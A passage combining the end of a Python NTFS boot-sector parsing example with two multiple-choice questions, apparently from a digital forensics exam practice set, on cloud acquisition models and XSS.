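    for key, value in parse_ntfs_boot_sector(sample_boot_sector()).items():
        print(f"{key}: {value}")
```

Run it against a real volume by handing it the first 512 bytes of the partition (not of the physical disk, where the MBR or GPT sits); `mft_byte_offset` is then the place to seek to for the $MFT, and `file_record_size` is the stride for walking its entries.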
Question # 175

Which cloud model allows an investigator to acquire the instance of a virtual machine and initiate the forensics examination process?

A.

PaaS model

B.

IaaS model

C.

SaaS model

D.

SecaaS model

Full Access
Question # 176

Which of the following attacks uses HTML tags like <script></script>?

A.

Phishing

B.

XSS attack

C.

SQL injection

D.

Spam

Full Access